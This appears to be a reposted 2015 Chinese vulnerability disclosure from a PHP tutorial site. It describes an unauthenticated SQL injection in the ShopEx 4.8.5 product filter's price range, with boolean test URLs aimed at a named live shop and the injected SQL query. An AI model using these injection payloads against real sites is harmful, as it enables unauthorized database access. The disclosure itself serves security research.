shopex 4.8.5 产品筛选页面某处没有intval导致注入-自学php网

shopex 4.8.5 产品筛选页面某处没有intval导致注入

来源：自学PHP网时间：2015-04-15 14:59 作者：阅读:次

[导读] 涉及版本：shopex-single-4 8 5 80603是否需要登录：无需登录是否默认配置：是有无利用代码：code漏洞细节：产品筛选页面价格区间某处没有intval导致注入 http: www dynest com readme txt9月2号的补...

涉及版本：shopex-single-4.8.5.80603是否需要登录：无需登录

是否默认配置：是有无利用代码：code
漏洞细节：
产品筛选页面价格区间某处没有intval导致注入.
http://www.dynest.com/readme.txt 9月2号的补丁

http://www.dynest.com/gallery–p,0,50%20and%200-0—1.html
没有产品

http://www.dynest.com/gallery–p,0,50%20and%201-0—1.html
返回正常

http://localhost/gallery–p,0,50(SQL)-0—1.html
实际执行的SQL为 select DISTINCT goods_id from sdb_products where price >= 0 AND price <= 50(SQL) AND disabled = ‘false’ AND marketable=’true’

ecshop 2.73 lib_transaction.php文件二次SQL注入漏洞分析

Bypass xss过滤的测试方法 - 网站安全 - 自学php

子栏目

shopex 4.8.5 产品筛选页面某处没有intval导致注入

最新评论

添加评论

更多文章推荐

添加评论